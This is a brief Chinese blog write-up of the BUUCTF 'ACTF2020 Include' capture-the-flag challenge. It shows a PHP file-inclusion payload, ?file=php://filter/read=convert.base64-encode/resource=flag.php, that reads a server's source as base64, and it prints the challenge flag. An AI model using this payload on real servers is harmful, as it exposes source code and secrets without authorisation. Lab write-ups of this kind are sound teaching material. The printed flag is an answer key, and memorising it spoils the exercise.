BUUCTF_Web_[ACTF2020 新生賽]IncludeBUUCTF_Web_[ACTF2020 新生賽]Include

2023-08-02 15:24:25

BUUCTF_Web_[ACTF2020 新生賽]Include

打開url可得以下頁面

1.點選tips

擷取到的url為
http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php
是一個php檔案,傳回字元串如下:
	Can you find out the flag?
	猜測讀取原碼:
		構造url:
		?file=php://filter/read=convert.base64-encode/resource=flag.php

回顯如下圖

BUUCTF_Web_[ACTF2020 新生賽]IncludeBUUCTF_Web_[ACTF2020 新生賽]Include

base64解碼可得flag

flag{9f07a190-37a9-4030-a60c-7f7f42ccf698}

buuctf

上一篇: 微信公衆号伺服器配置

下一篇: BUUCTF_Web_[ACTF2020 新生賽]ExecBUUCTF_Web_[ACTF2020 新生賽]Exec

繼續閱讀

[ACTF2020 新生賽]Include 1
buuctf
08-02
BUUCTF Reverse/[ACTF新生賽2020]Oruga
buuctf # BUUCTF Reverse
08-02
BUUCTF Reverse/[ACTF新生賽2020]SoulLike
buuctf # BUUCTF Reverse
08-02
BUUCTF Reverse/[ACTF新生賽2020]Universe_final_answer
buuctf # BUUCTF Reverse
08-02
BUUCTF_Web_[ACTF2020 新生賽]ExecBUUCTF_Web_[ACTF2020 新生賽]Exec
buuctf
08-02
buuctf-web-[ACTF2020 新生賽]Include
buuctf web 檔案包含
08-02
BUUCTF Reverse/刮開有獎
buuctf # BUUCTF Reverse
08-03
BUUCTF Reverse/[FlareOn4]login
buuctf # BUUCTF Reverse
08-03
BUUCTF Reverse/内涵的軟體
buuctf # BUUCTF Reverse
08-03
BUUCTF Reverse/Java逆向解密
buuctf # BUUCTF Reverse
08-03
BUUCTF Reverse/新年快樂
buuctf # BUUCTF Reverse
08-03
[BJDCTF2020]EasySearch
網絡安全 ctf buuctf web安全安全
08-06
buu練題記錄7-[網鼎杯 2020 青龍組]singal
buuctf Reserve
08-06
buu-Reserve：Youngter-drive
buuctf Reserve 資訊安全
08-06
buuctf [SWPU2019]Web1 1
ctf buuctf 刷題日記
08-07